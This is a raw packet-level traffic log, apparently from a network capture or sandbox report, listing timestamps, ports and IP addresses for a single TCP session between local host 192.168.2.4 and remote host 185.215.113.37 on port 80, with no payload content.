Sep 28, 2024 07:32:10.894071102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.894139051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.894149065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.894157887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.894169092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.894177914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.894179106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.894190073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.894197941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.894232988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.894435883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.894447088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.894457102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.894467115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.894474983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.894476891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.894486904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.894498110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.894504070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.894532919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.894691944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.894732952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.894733906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.894742966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.894769907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.894782066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.894979954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.894990921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.895000935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.895010948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.895020008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.895028114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.895030022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.895044088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.895054102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.895056009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.895065069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.895070076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.895080090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.895091057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.895098925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.895127058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.895533085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.895544052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.895554066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.895564079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.895576954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.895586014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.895591974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.895591974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.895602942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.895612955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.895622969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.895622969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.895633936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.895643950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.895648956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.895656109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.895661116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.895693064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.940231085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.940260887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.940272093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.940301895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.940340996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.940373898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.940385103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.940396070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.940411091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.940438986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.940489054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.940499067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.940509081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.940545082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.940556049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.940557957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.940567970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.940572023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.940601110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.940836906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.940846920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.940857887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.940877914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.940893888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.941052914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.941062927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.941072941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.941082954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.941092968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.941093922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.941103935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.941113949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.941118002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.941124916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.941133022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.941154003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.941174984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.941462994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.941473961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.941485882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.941495895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.941495895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.941508055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.941509962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.941523075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.941528082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.941535950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.941548109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.941551924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.941577911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.941601038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.941941977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.941952944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.941962957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.941978931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.941988945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.941989899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.941998959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.942004919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.942009926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.942020893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.942030907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.942037106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.942042112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.942053080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.942058086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.942061901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.942074060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.942076921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.942107916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.942538977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.942548990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.942558050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.942569971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.942579985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.942581892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.942590952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.942596912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.942605019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.942615032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.942625046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.942635059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.942636967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.942646027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.942667961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.942683935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.943135023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.943145990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.943155050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.943166018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.943176031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.943176031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.943195105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.943205118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.943214893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.943224907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.943232059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.943236113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.943247080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.943252087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.943257093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.943267107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.943272114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.943279982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.943289995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.943310022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.943329096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.980987072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.985804081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.209897041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.209925890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.209937096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.209958076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.209969044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.209979057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.209990025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210089922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210095882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.210095882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.210095882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.210140944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210140944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.210184097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.210225105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210235119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210244894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210257053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210268021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.210297108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.210407019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210417986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210427046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210438013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210447073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210450888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.210467100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.210494041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.210629940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210639954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210649014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210660934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210670948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210674047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.210697889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.210715055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.210886955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210896969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210906029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210916042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210926056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210936069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210938931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.210947037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210957050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.210972071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.210990906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.210999966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.211178064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.211189032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.211225986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.211267948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.211278915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.211288929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.211298943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.211308002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.211309910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.211325884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.211333990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.211337090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.211348057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.211358070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.211359978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.211373091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.211400986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.211777925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.211788893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.211797953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.211808920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.211817980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.211827993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.211833954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.211838007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.211848974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.211853027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.211859941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.211869955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.211872101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.211880922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.211891890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.211924076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.212392092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.212402105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.212410927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.212420940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.212430954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.212440968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.212471962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.212481976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.212481976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.212496042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.212500095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.212512016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.212522984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.212533951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.212533951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.212543011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.212549925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.212557077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.212568998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.212569952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.212579966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.212590933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.212606907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.212635994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.213155985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.213165998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.213175058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.213186026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.213196039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.213202953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.213207960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.213216066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.213218927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.213229895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.213239908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.213249922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.213251114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.213263035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.213273048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.213279963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.213284016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.213295937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.213300943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.213306904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.213316917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.213316917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.213329077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.213330984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.213342905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.213352919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.213362932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.213392019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.214101076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.214112997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.214123011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.214133024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.214140892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.214149952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.214154005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.214163065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.214173079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.214174032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.214184046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.214189053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.214195013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.214205980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.214215040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.214221001 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.214225054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.214236975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.214246035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.214250088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.214257002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.214265108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.214267015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.214277983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.214284897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.214288950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.214299917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.214309931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.214338064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.215024948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.215035915 CEST	80	49730	185.215.113.37	192.168.2.4
